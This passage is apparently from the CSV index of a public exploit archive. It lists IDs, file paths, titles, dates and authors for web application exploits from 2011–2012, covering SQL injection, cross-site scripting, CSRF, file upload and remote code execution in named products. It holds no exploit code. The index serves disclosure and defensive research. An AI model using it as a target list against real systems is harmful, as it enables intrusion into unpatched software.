+18262,exploits/multiple/webapps/18262.txt,"Plone and Zope - Remote Command Execution (PoC)",2011-12-21,"Nick Miles",webapps,multiple, +18265,exploits/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - 'snarf_ajax.php' Remote PHP Code Injection",2011-12-22,EgiX,webapps,php, +18266,exploits/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities",2011-12-23,mr_me,webapps,php, +18274,exploits/php/webapps/18274.txt,"OpenEMR 4 - Multiple Vulnerabilities",2011-12-25,Level,webapps,php, +18276,exploits/php/webapps/18276.txt,"WordPress Plugin Mailing List - Arbitrary File Download",2011-12-26,6Scan,webapps,php, +18277,exploits/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,webapps,php, +18412,exploits/php/webapps/18412.php,"WordPress Plugin Kish Guest Posting 1.0 - Arbitrary File Upload",2012-01-23,EgiX,webapps,php, +18287,exploits/php/webapps/18287.php,"Joomla! Component Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,webapps,php, +18288,exploits/php/webapps/18288.txt,"DIY-CMS blog mod - SQL Injection",2011-12-29,snup,webapps,php, +18290,exploits/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,webapps,php, +18292,exploits/php/webapps/18292.txt,"Dede CMS - SQL Injection",2011-12-30,"CWH & Nafsh",webapps,php, +18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php, +18297,exploits/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection",2012-01-02,"H4ckCity Security Team",webapps,php, +18298,exploits/php/webapps/18298.txt,"PHP-X-Links Script - SQL Injection",2012-01-02,"H4ckCity Security Team",webapps,php, +18300,exploits/php/webapps/18300.txt,"MyPHPDating 1.0 - SQL Injection",2012-01-02,ITTIHACK,webapps,php, +18982,exploits/windows/webapps/18982.txt,"Hexamail Server 4.4.5 - Persistent Cross-Site Scripting",2012-06-04,modpr0be,webapps,windows, +18308,exploits/php/webapps/18308.txt,"Typo3 4.5 < 4.7 - Remote Code Execution / Local File Inclusion / Remote File Inclusion",2012-01-04,MaXe,webapps,php, +18314,exploits/php/webapps/18314.txt,"Posse Softball Director CMS - SQL Injection",2012-01-04,"H4ckCity Security Team",webapps,php, +18983,exploits/php/webapps/18983.php,"Mnews 1.1 - 'view.php' SQL Injection",2012-06-04,WhiteCollarGroup,webapps,php, +18979,exploits/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",webapps,php, +18980,exploits/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 - Tagging Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",webapps,php, +18320,exploits/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",webapps,php, +19381,exploits/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution",2012-06-23,EgiX,webapps,php, +18322,exploits/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,webapps,php, +18985,exploits/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,webapps,php, +18329,exploits/multiple/webapps/18329.txt,"Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",webapps,multiple, +18330,exploits/php/webapps/18330.txt,"WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",webapps,php, +18335,exploits/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,webapps,php, +18338,exploits/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,webapps,php, +18340,exploits/php/webapps/18340.txt,"Paddelberg Topsite Script - Authentication Bypass",2012-01-09,"Christian Inci",webapps,php, +18341,exploits/php/webapps/18341.txt,"Clipbucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,webapps,php, +18342,exploits/php/webapps/18342.txt,"SAPID 1.2.3 Stable - Remote File Inclusion",2012-01-09,"Opa Yong",webapps,php, +18343,exploits/linux/webapps/18343.pl,"Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) - Remote File Disclosure",2012-01-09,"Todor Donev",webapps,linux, +18344,exploits/php/webapps/18344.txt,"RazorCMS 1.2 - Directory Traversal",2012-01-10,chap0,webapps,php, +18347,exploits/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,webapps,php, +18348,exploits/php/webapps/18348.txt,"w-CMS 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,webapps,php, +18350,exploits/php/webapps/18350.txt,"WordPress Plugin Age Verification 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",webapps,php, +18352,exploits/php/webapps/18352.txt,"Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",webapps,php, +18353,exploits/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,webapps,php, +18355,exploits/php/webapps/18355.txt,"WordPress Plugin Count Per Day - Multiple Vulnerabilities",2012-01-12,6Scan,webapps,php, +18356,exploits/php/webapps/18356.txt,"Tine 2.0 - Maischa Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,webapps,php, +18357,exploits/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload",2012-01-13,Dr.KroOoZ,webapps,php, +18373,exploits/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management - Directory Traversal",2012-01-15,"Chris Rock",webapps,jsp, +18374,exploits/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,webapps,php, +18371,exploits/php/webapps/18371.rb,"phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XML External Entity Injection (Metasploit)",2012-01-14,"Marco Batista",webapps,php, +18380,exploits/php/webapps/18380.txt,"Joomla! Component com_discussions - SQL Injection",2012-01-17,"Red Security TEAM",webapps,php, +18975,exploits/php/webapps/18975.rb,"Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)",2012-06-03,Metasploit,webapps,php, +18383,exploits/php/webapps/18383.txt,"pGB 2.12 - 'kommentar.php' SQL Injection",2012-01-18,3spi0n,webapps,php, +18384,exploits/php/webapps/18384.txt,"PHPBridges Blog System - 'members.php' SQL Injection",2012-01-18,3spi0n,webapps,php, +18385,exploits/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection",2012-01-18,"Easy Laster",webapps,php, +18386,exploits/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",webapps,php, +18389,exploits/php/webapps/18389.txt,"Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,webapps,php, +18390,exploits/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",webapps,php, +18700,exploits/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",webapps,php, +18392,exploits/php/webapps/18392.php,"appRain CMF 0.1.5 - 'Uploadify.php' Unrestricted Arbitrary File Upload",2012-01-19,EgiX,webapps,php, +18394,exploits/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,webapps,asp, +18395,exploits/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",webapps,asp, +18396,exploits/php/webapps/18396.sh,"WhatsApp - Remote Change Status",2012-01-20,emgent,webapps,php, +18402,exploits/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,webapps,php, +18403,exploits/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",webapps,php, +18404,exploits/php/webapps/18404.pl,"iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)",2012-01-21,Or4nG.M4N,webapps,php, +18405,exploits/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",webapps,asp, +18407,exploits/php/webapps/18407.txt,"WordPress Plugin AllWebMenus < 1.1.9 Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,webapps,php, +18410,exploits/php/webapps/18410.txt,"MiniCMS 1.0/2.0 - PHP Code Injection",2012-01-22,Or4nG.M4N,webapps,php, +18699,exploits/php/webapps/18699.txt,"Plume CMS 1.2.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-04-04,"Ivano Binetti",webapps,php, +18413,exploits/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,webapps,php, +18701,exploits/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",webapps,php, +18416,exploits/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",webapps,jsp, +18417,exploits/php/webapps/18417.txt,"WordPress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",webapps,php, +18418,exploits/php/webapps/18418.html,"VR GPub 4.0 - Cross-Site Request Forgery",2012-01-26,Cyber-Crystal,webapps,php, +18419,exploits/php/webapps/18419.html,"phpList 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting",2012-01-26,Cyber-Crystal,webapps,php, +18422,exploits/php/webapps/18422.txt,"Peel Shopping 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,webapps,php, +18424,exploits/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection (Metasploit)",2012-01-27,EgiX,webapps,php, +18429,exploits/php/webapps/18429.pl,"4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection",2012-01-30,Or4nG.M4N,webapps,php, +18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple, +18431,exploits/multiple/webapps/18431.txt,"Ajax Upload - Arbitrary File Upload",2012-01-30,"Daniel Godoy",webapps,multiple, +18432,exploits/php/webapps/18432.txt,"phux Download Manager - Blind SQL Injection",2012-01-30,"Red Security TEAM",webapps,php, +18435,exploits/php/webapps/18435.txt,"phpShowtime - Directory Traversal",2012-01-31,"Red Security TEAM",webapps,php, +18434,exploits/php/webapps/18434.txt,"Snort Report 1.3.2 - SQL Injection",2012-01-31,"a.kadir altan",webapps,php, +18438,exploits/php/webapps/18438.txt,"Ez Album - Blind SQL Injection",2012-01-31,"Red Security TEAM",webapps,php, +18439,exploits/php/webapps/18439.txt,"PragmaMX 1.2.10 - Persistent Cross-Site Scripting",2012-01-31,HauntIT,webapps,php, +18441,exploits/php/webapps/18441.txt,"Vastal I-Tech Agent Zone - 'search.php' Blind SQL Injection",2012-01-31,"Cagri Tepebasili",webapps,php, +18443,exploits/php/webapps/18443.txt,"swDesk - Multiple Vulnerabilities",2012-02-01,"Red Security TEAM",webapps,php, +18444,exploits/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",webapps,php, +18447,exploits/asp/webapps/18447.txt,"MailEnable Webmail - Cross-Site Scripting",2012-01-13,"Sajjad Pourali",webapps,asp, +18451,exploits/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",webapps,windows, +18452,exploits/multiple/webapps/18452.txt,"Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",webapps,multiple, +18455,exploits/php/webapps/18455.txt,"osCommerce 3.0.2 - Persistent Cross-Site Scripting",2012-02-02,Vulnerability-Lab,webapps,php, +18456,exploits/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,webapps,php, +18464,exploits/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",webapps,php, +18465,exploits/php/webapps/18465.txt,"BASE 1.4.5 - 'base_qry_main.php?t_view' SQL Injection",2012-02-06,"a.kadir altan",webapps,php, +18466,exploits/php/webapps/18466.txt,"Tube Ace (Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",webapps,php, +18467,exploits/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,webapps,php, +18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",webapps,php, +18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,webapps,php, +18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple, +18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php, +18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",webapps,php, +18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",webapps,hardware, +18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php, +18494,exploits/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Inclusion",2012-02-17,Vulnerability-Lab,webapps,php, +18495,exploits/php/webapps/18495.html,"almnzm 2.4 - Cross-Site Request Forgery (Add Admin)",2012-02-18,"HaNniBaL KsA",webapps,php, +18497,exploits/php/webapps/18497.txt,"4PSA CMS - SQL Injection",2012-02-19,"BHG Security Center",webapps,php, +18498,exploits/php/webapps/18498.html,"SyndeoCMS 3.0 - Cross-Site Request Forgery",2012-02-19,"Ivano Binetti",webapps,php, +18502,exploits/php/webapps/18502.html,"Plume CMS 1.2.4 - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",webapps,php, +18503,exploits/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",webapps,hardware, +18504,exploits/hardware/webapps/18504.txt,"Sagem F@ST 2604 ADSL Router - Cross-Site Request Forgery",2012-02-22,"KinG Of PiraTeS",webapps,hardware, +18561,exploits/php/webapps/18561.txt,"lizard cart - 'search.php' SQL Injection",2012-03-05,"Number 7",webapps,php, +18563,exploits/php/webapps/18563.txt,"Fork CMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",webapps,php, +18506,exploits/php/webapps/18506.txt,"Brim < 2.0.0 - SQL Injection",2012-02-22,ifnull,webapps,php, +18508,exploits/php/webapps/18508.txt,"LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,webapps,php, +18513,exploits/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - Steal Authentication Credentials",2012-02-22,"Ivano Binetti",webapps,php, +18509,exploits/hardware/webapps/18509.html,"D-Link DCS Series - Cross-Site Request Forgery (Change Admin Password)",2012-02-22,rigan,webapps,hardware, +18510,exploits/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,webapps,windows, +18511,exploits/hardware/webapps/18511.txt,"D-Link DSL-2640B ADSL Router - Authentication Bypass",2012-02-22,"Ivano Binetti",webapps,hardware, +18516,exploits/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,"Patrick de Brouwer",webapps,php, +18517,exploits/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",webapps,hardware, +18519,exploits/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,webapps,php, +18518,exploits/php/webapps/18518.rb,"The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",webapps,php, +18522,exploits/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution",2012-02-25,ls,webapps,php, +18523,exploits/php/webapps/18523.txt,"webgrind 1.0 - 'file' Local File Inclusion",2012-02-25,LiquidWorm,webapps,php, +18526,exploits/php/webapps/18526.php,"YVS Image Gallery - SQL Injection",2012-02-25,CorryL,webapps,php, +18527,exploits/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) 2.11 - Cross-Site Request Forgery (Delete Admin / Delete Article)",2012-02-26,"Ivano Binetti",webapps,php, +18536,exploits/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",webapps,php, +18702,exploits/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",webapps,php, +18540,exploits/hardware/webapps/18540.txt,"Yealink VOIP Phone - Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",webapps,hardware, +18544,exploits/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,webapps,php, +18545,exploits/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,webapps,php, +18560,exploits/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",webapps,php, +18549,exploits/php/webapps/18549.txt,"phxEventManager 2.0 Beta 5 - 'search.php' search_terms SQL Injection",2012-03-02,skysbsb,webapps,php, +18564,exploits/php/webapps/18564.txt,"Drupal 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",webapps,php, +18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple, +18554,exploits/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQL Injections",2012-03-03,G13,webapps,php, +18556,exploits/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x < 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,webapps,php, +18558,exploits/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection",2012-03-04,"Easy Laster",webapps,php, +18559,exploits/php/webapps/18559.txt,"AneCMS 2e2c583 - Local File Inclusion",2012-03-04,"I2sec-Jong Hwan Park",webapps,php, +18566,exploits/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",webapps,asp, +18567,exploits/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities",2012-03-07,Silent_Dream,webapps,windows, +18571,exploits/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,webapps,php, +18575,exploits/php/webapps/18575.txt,"RazorCMS 1.2.1 Stable - Cross-Site Request Forgery (Delete Web Pages)",2012-03-08,"Ivano Binetti",webapps,php, +18578,exploits/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple Vulnerabilities",2012-03-10,"Stefan Schurtz",webapps,php, +18574,exploits/php/webapps/18574.txt,"RazorCMS 1.2.1 STABLE - Arbitrary File Upload",2012-03-08,"i2sec_Hyo jun Oh",webapps,php, +18582,exploits/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,webapps,cgi, +18583,exploits/php/webapps/18583.txt,"Saman Portal - Local File Inclusion",2012-03-12,TMT,webapps,php, +18616,exploits/php/webapps/18616.txt,"Pre Printing Press - 'product_desc.php?pid' SQL Injection",2012-03-18,"Easy Laster",webapps,php, +18618,exploits/php/webapps/18618.pl,"Joomla! 2.5.0 < 2.5.1 - Blind SQL Injection",2012-03-19,"A. Ramos",webapps,php, +18589,exploits/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",webapps,php, +18595,exploits/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php, +18590,exploits/php/webapps/18590.txt,"PBLang Bulletin Board System - Local File Inclusion",2012-03-13,"Number 7",webapps,php, +18591,exploits/php/webapps/18591.txt,"Cycade Gallery - SQL Injection",2012-03-13,-DownFall,webapps,php, +18592,exploits/php/webapps/18592.txt,"4Images Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",webapps,php, +18597,exploits/hardware/webapps/18597.txt,"Sitecom WLM-2501 - Cross-Site Request Forgery",2012-03-14,"Ivano Binetti",webapps,hardware, +18598,exploits/php/webapps/18598.txt,"Encaps PHP Gallery - SQL Injection",2012-03-14,"Daniel Godoy",webapps,php, +18599,exploits/php/webapps/18599.txt,"asaanCart - Cross-Site Scripting / Local File Inclusion",2012-03-14,"Number 7",webapps,php, +18603,exploits/windows/webapps/18603.txt,"TVersity 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",webapps,windows, +18605,exploits/windows/webapps/18605.txt,"sockso 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",webapps,windows, +18607,exploits/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,webapps,php, +18608,exploits/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent Cross-Site Scripting",2012-03-16,storm,webapps,php, +18609,exploits/php/webapps/18609.txt,"FlexCMS 3.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-16,"Ivano Binetti",webapps,php, +18613,exploits/php/webapps/18613.txt,"ASP Classifieds - SQL Injection",2012-03-17,r45c4l,webapps,php, +18614,exploits/php/webapps/18614.txt,"PRE PRINTING STUDIO - SQL Injection",2012-03-17,r45c4l,webapps,php, +18632,exploits/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",webapps,php, +18626,exploits/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,webapps,jsp, +18631,exploits/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",webapps,php, +18932,exploits/linux/webapps/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,webapps,linux, +18638,exploits/hardware/webapps/18638.txt,"D-Link DIR-605 - Cross-Site Request Forgery",2012-03-21,iqzer0,webapps,hardware, +18639,exploits/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / Cross-Site Scripting",2012-03-21,LiquidWorm,webapps,php, +18644,exploits/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,webapps,php, +18646,exploits/hardware/webapps/18646.txt,"Cyberoam UTM - Multiple Vulnerabilities",2012-03-22,"Saurabh Harit",webapps,hardware, +18647,exploits/php/webapps/18647.txt,"PHP Grade Book 1.9.4 - Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",webapps,php, +18648,exploits/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 - Local File Inclusion",2012-03-22,"Mark Stanislav",webapps,php, +18649,exploits/php/webapps/18649.txt,"FreePBX 2.9.0/2.10.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",webapps,php, +18650,exploits/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,webapps,php, +18651,exploits/asp/webapps/18651.txt,"Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",webapps,asp, +18652,exploits/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",webapps,php, +18655,exploits/php/webapps/18655.php,"PHPFox 3.0.1 - 'ajax.php' Remote Command Execution",2012-03-23,EgiX,webapps,php, +18659,exploits/php/webapps/18659.rb,"FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit)",2012-03-24,Metasploit,webapps,php, +18660,exploits/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusions",2012-03-24,localh0t,webapps,php, +18676,exploits/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,webapps,php, +18670,exploits/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,webapps,php, +18667,exploits/php/webapps/18667.html,"Family CMS 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",webapps,php, +18668,exploits/php/webapps/18668.txt,"vBshop - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-03-26,ToiL,webapps,php, +18680,exploits/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,webapps,php, +18682,exploits/php/webapps/18682.txt,"ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injections",2012-03-30,"SecPod Research",webapps,php, +18685,exploits/php/webapps/18685.txt,"dalbum 144 build 174 - Cross-Site Request Forgery",2012-03-30,"Ahmed Elhady Mohamed",webapps,php, +18686,exploits/php/webapps/18686.txt,"SyndeoCMS 3.0.01 - Persistent Cross-Site Scripting",2012-03-30,"Ivano Binetti",webapps,php, +18687,exploits/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,webapps,php, +18689,exploits/php/webapps/18689.txt,"Woltlab Burning Board 2.2/2.3 [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",webapps,php, +18690,exploits/php/webapps/18690.txt,"WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",webapps,php, +18694,exploits/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",webapps,php, +18708,exploits/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",webapps,php, +18711,exploits/php/webapps/18711.txt,"w-CMS 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,webapps,php, +18715,exploits/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",webapps,multiple, +18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php, +18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi, +18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - Authenticated OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php, +18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php, +18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php, +18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php, +18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",webapps,php, +18736,exploits/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,webapps,php, +18737,exploits/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,webapps,php, +18741,exploits/php/webapps/18741.txt,"Joomla! Component com_ponygallery - SQL Injection",2012-04-15,xDarkSton3x,webapps,php, +18742,exploits/php/webapps/18742.php,"NetworX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-15,N3t.Crack3r,webapps,php, +18743,exploits/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script - SQL Injection",2012-04-15,"Daniel Godoy",webapps,php, +18745,exploits/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,webapps,multiple, +18750,exploits/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",webapps,multiple, +18752,exploits/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",webapps,php, +18753,exploits/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-19,"High-Tech Bridge SA",webapps,php, +18772,exploits/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,webapps,php, +18764,exploits/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities",2012-04-22,"Roberto Suggi Liverani",webapps,windows, +18766,exploits/windows/webapps/18766.txt,"Oracle GlassFish Server - REST Cross-Site Request 